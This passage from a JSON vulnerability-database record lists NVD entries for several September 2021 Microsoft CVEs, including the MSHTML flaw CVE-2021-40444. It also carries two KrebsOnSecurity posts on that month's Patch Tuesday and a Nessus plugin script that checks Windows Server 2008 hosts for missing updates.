"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-15T12:15:00", "type": "cve", "title": "CVE-2021-26435", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26435"], "modified": "2021-09-24T16:32:00", "cpe": ["cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2008:-"], "id": "CVE-2021-26435", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-26435", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:r2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:-:*:-:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:-:*:-:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*"]}, {"lastseen": "2023-05-23T15:39:12", "description": "Open Management Infrastructure Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-15T12:15:00", "type": "cve", "title": "CVE-2021-38647", "cwe": ["CWE-665"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2022-07-12T17:42:00", "cpe": ["cpe:/a:microsoft:azure_automation_update_management:-", "cpe:/a:microsoft:azure_automation_state_configuration:-", "cpe:/a:microsoft:azure_diagnostics_\$lad\$:-", "cpe:/a:microsoft:azure_security_center:-", "cpe:/a:microsoft:azure_stack_hub:-", "cpe:/a:microsoft:azure_open_management_infrastructure:-", "cpe:/a:microsoft:azure_sentinel:-", "cpe:/a:microsoft:system_center_operations_manager:-", "cpe:/a:microsoft:container_monitoring_solution:-", "cpe:/a:microsoft:log_analytics_agent:-"], "id": "CVE-2021-38647", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-38647", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:microsoft:azure_automation_update_management:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:azure_diagnostics_\$lad\$:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:azure_automation_state_configuration:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:log_analytics_agent:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:azure_sentinel:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:azure_open_management_infrastructure:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:azure_security_center:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:azure_stack_hub:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:container_monitoring_solution:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:system_center_operations_manager:-:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-23T15:42:50", "description": "Microsoft MSHTML Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-15T12:15:00", "type": "cve", "title": "CVE-2021-40444", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-10-14T11:49:00", "cpe": ["cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2016:-"], "id": "CVE-2021-40444", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-40444", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2012:-:r2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:-:*:-:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:-:*:-:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*"]}], "krebs": [{"lastseen": "2021-09-26T09:25:20", "description": "**Microsoft** today pushed software updates to plug dozens of security holes in Windows and related products, including a vulnerability that is already being exploited in active attacks. Also, **Apple** has issued an emergency update to fix a flaw that's reportedly been abused to install spyware on **iOS** products, and **Google**'s got a new version of **Chrome** that tackles two zero-day flaws. Finally, Adobe has released critical security updates for **Acrobat**, **Reader** and a slew of other software.\n\n![](https://krebsonsecurity.com/wp-content/uploads/2021/07/windupate.png)\n\nFour of the flaws fixed in this patch batch earned Microsoft's most-dire "critical" rating, meaning they could be exploited by miscreants or malware to remotely compromise a Windows PC with little or no help from the user.\n\nTop of the critical heap is [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>), which affects the \u201cMSHTML\u201d component of **Internet Explorer** (IE) on **Windows 10** and many **Windows Server** versions. In [a security advisory last week](<https://krebsonsecurity.com/2021/09/microsoft-attackers-exploiting-windows-zero-day-flaw/>), Microsoft warned attackers already are exploiting the flaw through **Microsoft Office** applications as well as IE.\n\nThe critical bug [CVE-2021-36965](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36965>) is interesting, as it involves a remote code execution flaw in "WLAN AutoConfig," the component in Windows 10 and many Server versions that handles auto-connections to Wi-Fi networks. One mitigating factor here is that the attacker and target would have to be on the same network, although many systems are configured to auto-connect to Wi-Fi network names with which they have previously connected.\n\n**Allan Liska**, senior security architect at [Recorded Future](<https://www.recordedfuture.com>), said a similar vulnerability -- [CVE-2021-28316](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-28316>) -- was announced in April.\n\n"CVE-2021-28316 was a security bypass vulnerability, not remote code execution, and it has never been reported as publicly exploited," Liska said. "That being said, the ubiquity of systems deployed with WLAN AutoConfig enabled could make it an attractive target for exploitation."\n\nAnother critical weakness that enterprises using Azure should prioritize is [CVE-2021-38647](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647>), which is a remote code execution bug in Azure Open Management Infrastructure (OMI) that has a CVSS Score of 9.8 (10 is the worst). It was [reported and detailed](<https://www.wiz.io/blog/secret-agent-exposes-azure-customers-to-unauthorized-code-execution>) by researchers at **Wiz.io**, who said CVE-2021-38647 was one of four bugs in Azure OMI they found that Microsoft patched this week.\n\n"We conservatively estimate that thousands of Azure customers and millions of endpoints are affected," Wiz.io's [Nir Ohfeld](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647>) wrote. "In a small sample of Azure tenants we analyzed, over 65% were unknowingly at risk."\n\nKevin** Breen** of [Immersive Labs](<https://www.immersivelabs.com/>) calls attention to several "privilege escalation" flaws fixed by Microsoft this month, noting that while these bugs carry lesser severity ratings, Microsoft considers them more likely to be exploited by bad guys and malware.\n\n"[CVE-2021-38639](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38639>) and [CVE-2021-36975](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36975>) have also been listed as 'exploitation more likely' and together cover the full range of supported Windows versions," Breem wrote. "I am starting to feel like a broken record when talking about privilege escalation vulnerabilities. They typically have a lower CVSS score than something like Remote Code Execution, but these local exploits can be the linchpin in the post-exploitation phases of an experienced attacker. If you can block them here you have the potential to significantly limit their damage. If we assume a determined attacker will be able to infect a victim\u2019s device through social engineering or other techniques, I would argue that patching these is even more important than patching some other Remote Code execution vulnerabilities."\n\nApple on Monday pushed out [an urgent security update](<https://support.apple.com/en-us/HT212807>) to fix a "zero-click" iOS vulnerability ([CVE-2021-30860](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30860>)) reported by researchers at **Citizen Lab** that allows commands to be run when files are opened on certain Apple devices. [Citizen Lab found](<https://citizenlab.ca/2021/09/forcedentry-nso-group-imessage-zero-click-exploit-captured-in-the-wild/>) that an exploit for CVE-2021-30860 was being used by the [NSO Group](<https://en.wikipedia.org/wiki/NSO_Group>), an Israeli tech company whose spyware enables the remote surveillance of smartphones.\n\n**Google** also released [a new version](<https://chromereleases.googleblog.com/2021/09/stable-channel-update-for-desktop.html>) of its **Chrome** browser on Monday to fix nine vulnerabilities, including two that are under active attack. If you're running Chrome, keep a lookout for when you see an "Update" tab appear to the right of the address bar. If it's been a while since you closed the browser, you might see the Update button turn from green to orange and then red. Green means an update has been available for two days; orange means four days have elapsed, and red means your browser is a week or more behind on important updates. Completely close and restart the browser to install any pending updates.\n\nAs it usually does on Patch Tuesday, Adobe also released new versions of Reader, Acrobat and [a large number of other products](<https://helpx.adobe.com/security.html>). Adobe says it is not aware of any exploits in the wild for any of the issues addressed in its updates today.\n\nFor a complete rundown of all patches released today and indexed by severity, check out the [always-useful Patch Tuesday roundup](<https://isc.sans.edu/forums/diary/Microsoft+September+2021+Patch+Tuesday/27834/>) from the **SANS Internet Storm Center**. And it\u2019s not a bad idea to hold off updating for a few days until Microsoft works out any kinks in the updates: [AskWoody.com](<https://www.askwoody.com/2021/september-2021-its-patch-day/>) usually has the lowdown on any patches that are causing problems for Windows users.\n\nOn that note, before you update _please_ make sure you have backed up your system and/or important files. It\u2019s not uncommon for a Windows update package to hose one\u2019s system or prevent it from booting properly, and some updates have been known to erase or corrupt files.\n\nSo do yourself a favor and backup before installing any patches. Windows 10 even has some [built-in tools](<https://lifehacker.com/how-to-back-up-your-computer-automatically-with-windows-1762867473>) to help you do that, either on a per-file/folder basis or by making a complete and bootable copy of your hard drive all at once.\n\nAnd if you wish to ensure Windows has been set to pause updating so you can back up your files and/or system before the operating system decides to reboot and install patches on its own schedule, [see this guide](<https://www.computerworld.com/article/3543189/check-to-make-sure-you-have-windows-updates-paused.html>).\n\nIf you experience glitches or problems installing any of these patches this month, please consider leaving a comment about it below; there\u2019s a decent chance other readers have experienced the same and may chime in here with useful tips.", "cvss3": {"exploitabilityScore": 0.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "PHYSICAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.6, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-09-14T21:00:42", "type": "krebs", "title": "Microsoft Patch Tuesday, September 2021 Edition", "bulletinFamily": "blog", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28316", "CVE-2021-30860", "CVE-2021-36965", "CVE-2021-36975", "CVE-2021-38639", "CVE-2021-38647", "CVE-2021-40444"], "modified": "2021-09-14T21:00:42", "id": "KREBS:2EC42B845847A6DCFE50ECEB9FF61C29", "href": "https://krebsonsecurity.com/2021/09/microsoft-patch-tuesday-september-2021-edition/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-25T09:25:19", "description": "**Microsoft Corp.** warns that attackers are exploiting a previously unknown vulnerability in **Windows 10** and many **Windows Server** versions to seize control over PCs when users open a malicious document or visit a booby-trapped website. There is currently no official patch for the flaw, but Microsoft has released recommendations for mitigating the threat.\n\n![](https://krebsonsecurity.com/wp-content/uploads/2021/09/ms-bldg.png)\n\nAccording to [a security advisory](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>) from Redmond, the security hole [CVE-2021-40444](<https://us-cert.cisa.gov/ncas/current-activity/2021/09/07/microsoft-releases-mitigations-and-workarounds-cve-2021-40444>) affects the "MSHTML" component of **Internet Explorer** (IE) on **Windows 10** and many **Windows Server** versions. IE been slowly abandoned for more recent Windows browsers like **Edge**, but the same vulnerable component also is used by **Microsoft Office** applications for rendering web-based content.\n\n"An attacker could craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine," Microsoft wrote. "The attacker would then have to convince the user to open the malicious document. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights."\n\nMicrosoft has not yet released a patch for CVE-2021-40444, but says users can mitigate the threat from this flaw by disabling the installation of all ActiveX controls in IE. Microsoft says the vulnerability is currently being used in targeted attacks, although its advisory credits three different entities with reporting the flaw.\n\nOn of the researchers credited -- **EXPMON** -- [said on Twitter](<https://twitter.com/EXPMON_/status/1435310341689331721>) that it had reproduced the attack on the latest Office 2019 / Office 365 on Windows 10.\n\n"The exploit uses logical flaws so the exploitation is perfectly reliable (& dangerous)," EXPMON tweeted.\n\nWindows users could see an official fix for the bug as soon as September 14, when Microsoft is slated to release its monthly "Patch Tuesday" bundle of security updates.\n\nThis year has been a tough one for Windows users and so-called "zero day" threats, which refers to vulnerabilities that are not patched by current versions of the software in question, and are being actively exploited to break into vulnerable computers.\n\nVirtually every month in 2021 so far, Microsoft has been forced to respond to zero-day threats targeting huge swaths of its user base. In fact, by my count May was the only month so far this year that Microsoft didn't release a patch to fix at least one zero-day attack in Windows or supported software.\n\nMany of those zero-days involve older Microsoft technologies or those that have been retired, like IE11; Microsoft [officially retired support for Microsoft Office 365 apps and services on IE11](<https://techcommunity.microsoft.com/t5/microsoft-365-blog/microsoft-365-apps-say-farewell-to-internet-explorer-11-and/ba-p/1591666>) last month. In July, Microsoft [rushed out a fix for the Print Nightmare vulnerability](<https://krebsonsecurity.com/2021/07/microsoft-issues-emergency-patch-for-windows-flaw/>) that was present in every supported version of Windows, only to see the patch cause problems for a number of Windows users.\n\nOn June's Patch Tuesday, Microsoft [addressed six zero-day security holes](<https://krebsonsecurity.com/2021/06/microsoft-patches-six-zero-day-security-holes/>). And of course in March, hundreds of thousands of organizations running **Microsoft Exchange** email servers found those systems [compromised with backdoors thanks to four zero-day flaws in Exchange](<https://krebsonsecurity.com/2021/03/at-least-30000-u-s-organizations-newly-hacked-via-holes-in-microsofts-email-software/>).", "cvss3": {}, "published": "2021-09-08T15:03:45", "type": "krebs", "title": "Microsoft: Attackers Exploiting Windows Zero-Day Flaw", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-08T15:03:45", "id": "KREBS:409088FC2DFC219B74043104C2B672CC", "href": "https://krebsonsecurity.com/2021/09/microsoft-attackers-exploiting-windows-zero-day-flaw/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2023-05-18T15:33:46", "description": "The remote Windows host is missing security update 5005618 or cumulative update 5005606. It is, therefore, affected by multiple vulnerabilities :\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-26435)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-36962, CVE-2021-38629, CVE-2021-38635, CVE-2021-38636)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-36955, CVE-2021-36963, CVE-2021-36964, CVE-2021-36968, CVE-2021-38625, CVE-2021-38626, CVE-2021-38628, CVE-2021-38633, CVE-2021-38638, CVE-2021-38639, CVE-2021-38667, CVE-2021-38671, CVE-2021-40447)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-36965)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-36961)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2021-36959)", "cvss3": {}, "published": "2021-09-14T00:00:00", "type": "nessus", "title": "KB5005618: Windows Server 2008 September 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26435", "CVE-2021-36955", "CVE-2021-36959", "CVE-2021-36961", "CVE-2021-36962", "CVE-2021-36963", "CVE-2021-36964", "CVE-2021-36965", "CVE-2021-36968", "CVE-2021-38625", "CVE-2021-38626", "CVE-2021-38628", "CVE-2021-38629", "CVE-2021-38633", "CVE-2021-38635", "CVE-2021-38636", "CVE-2021-38638", "CVE-2021-38639", "CVE-2021-38667", "CVE-2021-38671", "CVE-2021-40447"], "modified": "2022-01-26T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_SEP_5005606.NASL", "href": "https://www.tenable.com/plugins/nessus/153386", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153386);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/26\");\n\n script_cve_id(\n \"CVE-2021-26435\",\n \"CVE-2021-36955\",\n \"CVE-2021-36959\",\n \"CVE-2021-36961\",\n \"CVE-2021-36962\",\n \"CVE-2021-36963\",\n \"CVE-2021-36964\",\n \"CVE-2021-36965\",\n \"CVE-2021-36968\",\n \"CVE-2021-38625\",\n \"CVE-2021-38626\",\n \"CVE-2021-38628\",\n \"CVE-2021-38629\",\n \"CVE-2021-38633\",\n \"CVE-2021-38635\",\n \"CVE-2021-38636\",\n \"CVE-2021-38638\",\n \"CVE-2021-38639\",\n \"CVE-2021-38667\",\n \"CVE-2021-38671\",\n \"CVE-2021-40447\"\n );\n script_xref(name:\"MSKB\", value:\"5005606\");\n script_xref(name:\"MSKB\", value:\"5005618\");\n script_xref(name:\"MSFT\", value:\"MS21-5005606\");\n script_xref(name:\"MSFT\", value:\"MS21-5005618\");\n script_xref(name:\"IAVA\", value:\"2021-A-0431-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0429-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"KB5005618: Windows Server 2008 September 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005618\nor cumulative update 5005606. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-26435)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-36962, CVE-2021-38629,\n CVE-2021-38635, CVE-2021-38636)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-36955, CVE-2021-36963, CVE-2021-36964,\n CVE-2021-36968, CVE-2021-38625, CVE-2021-38626,\n CVE-2021-38628, CVE-2021-38633, CVE-2021-38638,\n CVE-2021-38639, CVE-2021-38667, CVE-2021-38671,\n CVE-2021-40447)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-36965)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-36961)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2021-36959)\");\n # https://support.microsoft.com/en-us/topic/september-14-2021-kb5005606-monthly-rollup-e6cb2ae9-f688-4f8b-b742-43b03b791d6d\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?16fe7ded\");\n # https://support.microsoft.com/en-us/topic/september-14-2021-kb5005618-security-only-update-08a80048-babc-41ce-8b4b-cfd10c7c0dda\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?32ea9fe0\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB5005618 or Cumulative Update KB5005606.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36965\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/09/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS21-09\";\nkbs = make_list('5005606', '5005618');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.0\",\n sp:2,\n rollup_date:'09_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005606, 5005618])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:33:59", "description": "The remote Windows host is missing security update 5005615 or cumulative update 5005633. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-36955, CVE-2021-36963, CVE-2021-36964, CVE-2021-36968, CVE-2021-38628, CVE-2021-38630, CVE-2021-38633, CVE-2021-38638, CVE-2021-38639, CVE-2021-38667, CVE-2021-38671, CVE-2021-40447)\n\n - An information disclosure vulnerability. An 